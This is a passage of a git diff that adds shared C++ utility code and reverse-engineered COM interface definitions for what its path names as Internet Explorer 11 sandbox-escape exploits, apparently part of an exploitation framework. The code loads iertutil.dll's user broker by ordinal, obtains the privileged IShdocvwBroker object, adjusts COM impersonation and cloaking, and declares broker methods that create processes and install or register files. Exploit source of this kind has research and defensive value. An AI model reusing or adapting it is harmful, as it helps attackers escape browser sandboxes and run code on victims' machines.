+{ + if (!g_hasShDocIID) + { + memset(&g_shDocIID, 0, sizeof(g_shDocIID)); + + g_hasShDocIID; + + GetIIDForName(L"ISHDocVwBroker", &g_shDocIID); + } + + return g_shDocIID; +} + +bstr_t GetTemp(LPCWSTR name) +{ + WCHAR tempPath[MAX_PATH]; + + GetTempPath(MAX_PATH, tempPath); + + PathAppend(tempPath, name); + + return tempPath; +} + +bstr_t GetTempPath() +{ + WCHAR tempPath[MAX_PATH]; + + GetTempPath(MAX_PATH, tempPath); + + return tempPath; +} + +bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len) +{ + WCHAR tempPath[MAX_PATH]; + + GetTempPath(MAX_PATH, tempPath); + + PathAppend(tempPath, name); + + FILE* fp = nullptr; + + if (_wfopen_s(&fp, tempPath, L"wb") == 0) + { + fwrite(buf, 1, len, fp); + + fclose(fp); + + return tempPath; + } + else + { + return L""; + } +} + +std::vector<unsigned char> ReadFileToMem(LPCWSTR name) +{ + FILE* fp; + std::vector<unsigned char> ret; + + if (_wfopen_s(&fp, name, L"rb") == 0) + { + fseek(fp, 0, SEEK_END); + + ret.resize(ftell(fp)); + fseek(fp, 0, SEEK_SET); + + fread(&ret[0], 1, ret.size(), fp); + + fclose(fp); + } + + return ret; +} + +void DebugPrintf(LPCSTR lpFormat, ...) +{ +#ifdef _DEBUG + CHAR buf[1024]; + va_list va; + + va_start(va, lpFormat); + + StringCbVPrintfA(buf, sizeof(buf), lpFormat, va); + + OutputDebugStringA(buf); +#endif +} + +bstr_t GetUserSid() +{ + HANDLE hToken = nullptr; + PTOKEN_USER pUser = nullptr; + LPWSTR userName = nullptr; + bstr_t ret; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) + { + DebugPrintf("Error opening process token: %d", GetLastError()); + goto error; + } + + //TOKEN_USER user = { 0 }; + DWORD retLength = 0; + + if (!GetTokenInformation(hToken, TokenUser, nullptr, 0, &retLength)) + { + if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) + { + DebugPrintf("Error getting token information size: %d", GetLastError()); + goto error; + } + } + + pUser = (PTOKEN_USER) new char[retLength]; + + if (!GetTokenInformation(hToken, TokenUser, pUser, retLength, &retLength)) + { + DebugPrintf("Error getting token information: %d", GetLastError()); + goto error; + } + + if (!ConvertSidToStringSidW(pUser->User.Sid, &userName)) + { + DebugPrintf("Error converting Sid to String: %d", GetLastError()); + goto error; + } + + ret = userName; + +error: + + if (hToken) + { + CloseHandle(hToken); + } + + if (pUser) + { + delete[] pUser; + } + + if (userName) + { + LocalFree(userName); + } + + return ret; +} + +typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker); + +GUID CLSID_CShdocvwBroker = { 0x9C7A1728, +0x0B694, 0x427A, { 0x94, 0xA2, 0xA1, 0xB2, 0xC6, 0x0F, 0x03, 0x60 } }; + +void DisableImpersonation(IUnknown* pUnk) +{ + IClientSecurity* sec = nullptr; + + HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec)); + if (SUCCEEDED(hr)) + { + hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_ANONYMOUS, nullptr, EOAC_NONE); + DebugPrintf("SetBlanket: %08X", hr); + sec->Release(); + } + else + { + DebugPrintf("Error getting client security: %08X", hr); + } +} + +void SetCloaking(IUnknown* pUnk) +{ + IClientSecurity* sec = nullptr; + + HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec)); + if (SUCCEEDED(hr)) + { + hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, + RPC_C_IMP_LEVEL_IDENTIFY, nullptr, EOAC_DYNAMIC_CLOAKING); + DebugPrintf("SetBlanket: %08X", hr); + sec->Release(); + } + else + { + DebugPrintf("Error getting client security: %08X", hr); + } +} + +IIEUserBrokerPtr CreateBroker() +{ + HMODULE hMod = LoadLibrary(L"iertutil.dll"); + + fCoCreateUserBroker pfCoCreateUserBroker = (fCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58); + + if (pfCoCreateUserBroker) + { + IIEUserBrokerPtr broker; + + HRESULT ret = pfCoCreateUserBroker(&broker); + + DebugPrintf("CreateBroker: %08X - %p", ret, broker); + + return broker; + } + + return nullptr; +} + +IShdocvwBroker* CreateSHDocVw() +{ + IIEUserBrokerPtr broker = CreateBroker(); + + if (broker != nullptr) + { + HRESULT ret; + IShdocvwBroker* shdocvw; + ret = broker->BrokerCreateKnownObject(CLSID_CShdocvwBroker, GetSHDocIID(), (IUnknown**)&shdocvw); + DebugPrintf("IShdocvwBroker: %08X %p", ret, shdocvw); + + if (SUCCEEDED(ret)) + { + return shdocvw; + } + } + + return nullptr; +} + +bstr_t GetWindowsSystemDirectory() +{ + WCHAR buf[MAX_PATH]; + + GetSystemDirectory(buf, MAX_PATH); + + return buf; +} + +bstr_t GetExecutableFileName(HMODULE hModule) +{ + WCHAR buf[MAX_PATH]; + + ::GetModuleFileNameW(hModule, buf, MAX_PATH); + + return buf; +} + +bstr_t GetSessionPath() +{ + std::wstringstream ss; + + WCHAR objPath[MAX_PATH + 1] = { 0 }; + ULONG length = MAX_PATH; + DWORD dwSessionId; + + if (ProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId)) + { + ss << L"\\Sessions\\" << dwSessionId; + + return ss.str().c_str(); + } + + return L""; +} + +LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString) +{ + return RegSetValueEx(hKey, lpName, 0, REG_SZ, (const BYTE*)lpString, (wcslen(lpString) + 1) * sizeof(WCHAR)); +} + +LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d) +{ + return RegSetValueEx(hKey, lpName, 0, REG_DWORD, (const BYTE*)&d, sizeof(d)); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h new file mode 100755 index 0000000000..db2c100fc8 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h @@ -0,0 +1,21 @@ +#include "interfaces.h" + +#include <vector> + +bstr_t GetTemp(LPCWSTR name); +bstr_t GetTempPath(); +bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len); +std::vector<unsigned char> ReadFileToMem(LPCWSTR name); +void DebugPrintf(LPCSTR lpFormat, ...); +bstr_t GetUserSid(); +void DisableImpersonation(IUnknown* pUnk); +void SetCloaking(IUnknown* pUnk); +IIEUserBrokerPtr CreateBroker(); +IShdocvwBroker* CreateSHDocVw(); +bstr_t GetWindowsSystemDirectory(); +bstr_t GetExecutableFileName(HMODULE hModule); +extern "C" int DeleteLink(LPCWSTR par_src); +extern "C" int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile); +bstr_t GetSessionPath(); +LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString); +LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d); \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h new file mode 100755 index 0000000000..c210b8ed2e --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h @@ -0,0 +1,258 @@ +#pragma once + +#include <tchar.h> +#include <Windows.h> +#include <comdef.h> +#include <Shtypes.h> +#include <DocObj.h> + +struct __declspec(uuid("1AC7516E-E6BB-4A69-B63F-E841904DC5A6")) IIEUserBroker : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE Initialize(HWND *, LPCWSTR, LPDWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE CreateProcessW(DWORD pid, LPWSTR appName, LPWSTR cmdline, DWORD, DWORD, LPCSTR, WORD*, /* _BROKER_STARTUPINFOW*/ void *, /* _BROKER_PROCESS_INFORMATION */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE WinExec(DWORD pid, LPCSTR, DWORD, DWORD*) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCreateKnownObject(_GUID const &, _GUID const &, IUnknown * *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstance() = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstanceEx(DWORD pid, _GUID const &, IUnknown *, DWORD, _COSERVERINFO *, DWORD, /* tagBROKER_MULTI_QI */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoGetClassObject(DWORD pid, _GUID const &, DWORD, _COSERVERINFO *, _GUID const &, IUnknown * *) = 0; +}; + +struct __declspec(uuid("BDB57FF2-79B9-4205-9447-F5FE85F37312")) CIEAxInstallBroker +{ +}; + +struct __declspec(uuid("B2103BDB-B79E-4474-8424-4363161118D5")) IIEAxInstallBrokerBroker : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE BrokerGetAxInstallBroker(REFCLSID rclsid, REFIID riid, int unknown, int type, HWND, IUnknown** ppv) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IIEAxInstallBrokerBroker, __uuidof(IIEAxInstallBrokerBroker)); + +struct ERF +{ + //+0x000 erfOper : Int4B + // + 0x004 erfType : Int4B + // + 0x008 fError : Int4B + + int erfOper; + int erfType; + int fError; +}; + +struct FNAME +{ + /*+0x000 pszFilename : Ptr32 Char + + 0x004 pNextName : Ptr32 sFNAME + + 0x008 status : Uint4B*/ + + char* pszFilenane; + FNAME* pNextName; + UINT status; +}; + +struct SESSION +{ + /*+0x000 cbCabSize : Uint4B + + 0x004 erf : ERF + + 0x010 pFileList : Ptr32 sFNAME + + 0x014 cFiles : Uint4B + + 0x018 flags : Uint4B + + 0x01c achLocation : [260] Char + + 0x120 achFile : [260] Char + + 0x224 achCabPath : [260] Char + + 0x328 pFilesToExtract : Ptr32 sFNAME*/ + + UINT cbCabSize; + ERF erf; + FNAME* pFileList; + UINT cFiles; + UINT flags; + char achLocation[260]; + char achFile[260]; + char achCabPath[260]; + FNAME* pFilesToExtract; +}; + +struct __declspec(uuid("BC0EC710-A3ED-4F99-B14F-5FD59FDACEA3")) IIeAxiInstaller2 : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE VerifyFile(BSTR, HWND__ *, BSTR, BSTR, BSTR, unsigned int, unsigned int, _GUID const &, BSTR*, unsigned int *, unsigned char **) = 0; + virtual HRESULT STDMETHODCALLTYPE RunSetupCommand(BSTR, HWND__ *, BSTR, BSTR, BSTR, BSTR, unsigned int, unsigned int *) = 0; + virtual HRESULT STDMETHODCALLTYPE InstallFile(BSTR sessionGuid, HWND__ *, BSTR sourcePath, BSTR sourceFile, BSTR destPath, BSTR destFile, unsigned int unk) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterExeFile(BSTR sessionGuid, BSTR cmdline, int unk, _PROCESS_INFORMATION *) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterDllFile(BSTR, BSTR, int) = 0; + virtual HRESULT STDMETHODCALLTYPE InstallCatalogFile(BSTR, BSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateLanguageCheck(BSTR, unsigned short const *, _FILETIME) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateModuleUsage(BSTR, char const *, char const *, char const *, char const *, unsigned int) = 0; + virtual HRESULT STDMETHODCALLTYPE EnumerateFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0; + virtual HRESULT STDMETHODCALLTYPE ExtractFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0; + virtual HRESULT STDMETHODCALLTYPE RemoveExtractedFilesAndDirs(BSTR, SESSION *) = 0; + virtual HRESULT STDMETHODCALLTYPE CreateExtensionsManager(BSTR, _GUID const &, IUnknown * *) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterDllFile2(BSTR, BSTR, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit2(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, int *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0; + virtual HRESULT STDMETHODCALLTYPE UpdateAllowedDomainsList(_GUID const &, BSTR, int) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteExtractedFile(char const *) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IIeAxiInstaller2, __uuidof(IIeAxiInstaller2)); + +struct __declspec(uuid("9AEA8A59-E0C9-40F1-87DD-757061D56177")) IIeAxiAdminInstaller : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE InitializeAdminInstaller(BSTR, BSTR, BSTR*) = 0; +}; + +_COM_SMARTPTR_TYPEDEF(IIeAxiAdminInstaller, __uuidof(IIeAxiAdminInstaller)); + +struct __declspec(uuid("A4AAAE00-22E5-4742-ABB7-379D9493A3B7")) IShdocvwBroker : IUnknown +{ + virtual HRESULT STDMETHODCALLTYPE RedirectUrl(WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE RedirectShortcut(WORD const *, WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE RedirectUrlWithBindInfo(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE NavigateUrlInNewTabInstance(/* _BROKER_BIND_INFO */ void *, /*_BROKER_REDIRECT_DETAIL */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowInternetOptions(HWND *, WORD const *, WORD const *, long, ITEMIDLIST_ABSOLUTE * *, DWORD, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsZones(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsLanguages(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowPopupManager(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowCachesAndDatabases(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE ConfigurePopupExemption(HWND *, int, WORD const *, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ConfigurePopupMgr(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE RemoveFirstHomePage(void) = 0; + virtual HRESULT STDMETHODCALLTYPE SetHomePage(HWND *, long, ITEMIDLIST_ABSOLUTE * *, long) = 0; + virtual HRESULT STDMETHODCALLTYPE RemoveHomePage(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE FixInternetSecurity(HWND *, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowManageAddons(HWND *, DWORD, _GUID *, DWORD, int) = 0; + virtual HRESULT STDMETHODCALLTYPE CacheExtFileVersion(_GUID const &, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAxApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE SendLink(ITEMIDLIST_ABSOLUTE const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE SendPage(HWND *, IDataObject *) = 0; + virtual HRESULT STDMETHODCALLTYPE NewMessage(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ReadMail(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE SetAsBackground(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSaveBrowseFile(HWND *, WORD const *, WORD const *, int, int, WORD * *, DWORD *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveAsComplete(void) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveAsFile(void) = 0; + virtual HRESULT STDMETHODCALLTYPE StartImportExportWizard(int, HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE EditWith(HWND *, DWORD, HANDLE, DWORD, LPCWSTR, LPCWSTR, LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSaveImage(HWND *, WORD const *, DWORD, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveImage(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE CreateShortcut(/* _internet_shortcut_params */ void*, int, HWND *, WORD *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSynchronizeUI(void) = 0; + virtual HRESULT STDMETHODCALLTYPE OpenFolderAndSelectItem(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoGetOpenFileNameDialog(/* _SOpenDlg */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoGetLocationPlatformConsent(HWND *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowSaveFileName(HWND *, WORD const *, WORD const *, WORD const *, WORD const *, DWORD, WORD *, DWORD, WORD const *, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE SaveFile(HWND *, DWORD, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE VerifyTrustAndExecute(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFeedByUrl(WORD const *, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerAddToFavoritesEx(HWND *, ITEMIDLIST_ABSOLUTE const *, WORD const *, DWORD, IOleCommandTarget *, WORD *, DWORD, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE Subscribe(HWND *, WORD const *, WORD const *, int, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE MarkAllItemsRead(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE MarkItemsRead(WORD const *, DWORD *, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE Properties(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteFeedItem(HWND *, WORD const *, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteFeed(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DeleteFolder(HWND *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE Refresh(WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE MoveFeed(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE MoveFeedFolder(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE RenameFeed(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE RenameFeedFolder(HWND *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE NewFeedFolder(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE FeedRefreshAll(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowFeedAuthDialog(HWND *, WORD const *, /* FEEDTASKS_AUTHTYPE */ DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAddSearchProvider(HWND *, WORD const *, WORD const *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE InitHKCUSearchScopesRegKey(void) = 0; + virtual HRESULT STDMETHODCALLTYPE DoShowDeleteBrowsingHistoryDialog(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE StartAutoProxyDetection(void) = 0; + virtual HRESULT STDMETHODCALLTYPE EditAntiPhishingOptinSetting(HWND *, DWORD, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowMyPictures(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ChangeIntranetSettings(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE FixProtectedModeSettings(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAddService(HWND *, WORD const *, WORD const *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAddWebFilter(HWND *, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoBrowserRegister() = 0; + virtual HRESULT STDMETHODCALLTYPE DoBrowserRevoke(long) = 0; + virtual HRESULT STDMETHODCALLTYPE DoOnNavigate(long, VARIANT *) = 0; + virtual HRESULT STDMETHODCALLTYPE AddDesktopComponent(WORD *, WORD *, VARIANT *, VARIANT *, VARIANT *, VARIANT *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoOnCreated(long, IUnknown *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetShellWindows(IUnknown * *) = 0; + virtual HRESULT STDMETHODCALLTYPE CustomizeSettings(short, short, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE OnFocus(int) = 0; + virtual HRESULT STDMETHODCALLTYPE IsProtectedModeUrl(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE DoDiagnoseConnectionProblems(HWND *, WORD *, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE PerformDoDragDrop(HWND *, /* IEDataObjectWrapper */ void *, /* IEDropSourceWrapper */ void *, DWORD, DWORD, DWORD *, long *) = 0; + virtual HRESULT STDMETHODCALLTYPE TurnOnFeedSyncEngine(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE InternetSetPerSiteCookieDecisionW(WORD const *, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE SetAttachmentUserOverride(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE WriteClassesOfCategory(_GUID const &, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerSetFocus(DWORD, HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconA(DWORD, /* _BROKER_NOTIFYICONDATAA */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconW(DWORD, /* _BROKER_NOTIFYICONDATAW */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE DisplayVirtualizedFolder(void) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerSetWindowPos(HWND *, HWND *, int, int, int, int, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE WriteUntrustedControlDetails(_GUID const &, WORD const *, WORD const *, DWORD, BYTE *) = 0; + virtual HRESULT STDMETHODCALLTYPE SetComponentDeclined(char const *, char const *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoShowPrintDialog(/* _BROKER_PRINTDLG */ void*) = 0; + virtual HRESULT STDMETHODCALLTYPE NavigateHomePages(void) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowAxDomainApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ActivateExtensionFromCLSID(HWND *, WORD const *, DWORD, DWORD, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateNewIEWindow(DWORD, _GUID const &, void * *, int, DWORD, int, int) = 0; + virtual HRESULT STDMETHODCALLTYPE BeginFakeModalityForwardingToTab() = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerEnableWindow(int, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE EndFakeModalityForwardingToTab(HWND *, long) = 0; + virtual HRESULT STDMETHODCALLTYPE CloseOldTabIfFailed(void) = 0; + virtual HRESULT STDMETHODCALLTYPE EnableSuggestedSites(HWND *, int) = 0; + virtual HRESULT STDMETHODCALLTYPE SetProgressValue(HWND *, DWORD, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerStartNewIESession(void) = 0; + virtual HRESULT STDMETHODCALLTYPE CompatDetachInputQueue(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE CompatAttachInputQueue(void) = 0; + virtual HRESULT STDMETHODCALLTYPE SetToggleKeys(DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE RepositionInfrontIE(HWND *, int, int, int, int, DWORD) = 0; + //virtual HRESULT STDMETHODCALLTYPE ReportShipAssert(DWORD, DWORD, DWORD, WORD const *, WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowOpenSafeOpenDialog(HWND *, /* _BROKER_SAFEOPENDLGPARAM */ void *, DWORD *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerAddSiteToStart(HWND *, WORD *, WORD const *, long, DWORD) = 0; + virtual HRESULT STDMETHODCALLTYPE SiteModeAddThumbnailButton(DWORD *, HWND *, WORD *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE SiteModeAddButtonStyle(int *, HWND *, DWORD, WORD *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE IsSiteModeFirstRun(int, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE IsImmersiveSiteModeFirstRun(int, WORD const *, WORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetImmersivePinnedState(DWORD, int, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerDoSiteModeDragDrop(DWORD, long *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE EnterUILock(long) = 0; + virtual HRESULT STDMETHODCALLTYPE LeaveUILock(long) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialAdd(/* _IECREDENTIAL */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialGet(WORD const *, WORD const *, /*_IECREDENTIAL */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialFindAllByUrl(WORD const *, DWORD *, /* _IECREDENTIAL */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE CredentialRemove(WORD const *, WORD const *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowOpenFile(HWND *, DWORD, DWORD, WORD *, WORD *, WORD const *, WORD const *, WORD const *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowImmersiveOpenFilePicker(HWND *, int, WORD const *, IUnknown * *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE RegisterFileDragDrop(HWND *, DWORD, unsigned char *) = 0; + virtual HRESULT STDMETHODCALLTYPE RevokeFileDragDrop(HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropA(HWND *, DWORD, char * *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropW(HWND *, DWORD, WORD * *, /* _OPEN_FILE_RESULT */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowEPMCompatDocHostConsent(HWND *, WORD const *, WORD const *, int *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetModuleInfoFromSignature(WORD const *, WORD * *, DWORD, WORD * *, WORD * *, WORD * *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShellExecWithActivationHandler(HWND *, LPCWSTR, LPCWSTR, int, /* _MSLAUNCH_HANDLER_STATUS */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE ShellExecFolderUri(LPCWSTR) = 0; + virtual HRESULT STDMETHODCALLTYPE ShowIMMessageDialog(HWND *, WORD const *, WORD const *, /* _IM_BUTTON_LABEL_ID */ void *, DWORD, DWORD, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetFileHandle(HWND *, BSTR filename, BYTE * hash, DWORD hashlen, HANDLE*) = 0; + virtual HRESULT STDMETHODCALLTYPE MOTWCreateFileW(DWORD dwProcessId, BSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, int dwOpenMode, DWORD dwFlagsAndAttributes, ULONGLONG* h, DWORD *error) = 0; + virtual HRESULT STDMETHODCALLTYPE MOTWFindFileW() = 0; + virtual HRESULT STDMETHODCALLTYPE MOTWGetFileDataW() = 0; + virtual HRESULT STDMETHODCALLTYPE WinRTInitializeWithWindow(IUnknown *, HWND *) = 0; + virtual HRESULT STDMETHODCALLTYPE DoProvisionNetworks(HWND *, WORD const *, DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetAccessibilityStylesheet(DWORD, unsigned __int64 *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetAppCacheUsage(WORD const *, unsigned __int64 *, unsigned __int64 *) = 0; + virtual HRESULT STDMETHODCALLTYPE HiddenTabRequest(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* _HIDDENTAB_REQUEST_INFO */ void *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetMaxCpuSpeed(DWORD *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetProofOfPossessionTokensForUrl(WORD const *, DWORD *, /* _IEProofOfPossessionToken */ void * *) = 0; + virtual HRESULT STDMETHODCALLTYPE GetLoginUrl(LPWSTR*) = 0; + virtual HRESULT STDMETHODCALLTYPE ScheduleDeleteEncryptedMediaData() = 0; + virtual HRESULT STDMETHODCALLTYPE IsDeleteEncryptedMediaDataPending() = 0; + virtual HRESULT STDMETHODCALLTYPE GetFrameAppDataPathA() = 0; + virtual HRESULT STDMETHODCALLTYPE BrokerHandlePrivateNetworkFailure() = 0; + +}; + + +_COM_SMARTPTR_TYPEDEF(IIEUserBroker, __uuidof(IIEUserBroker)); 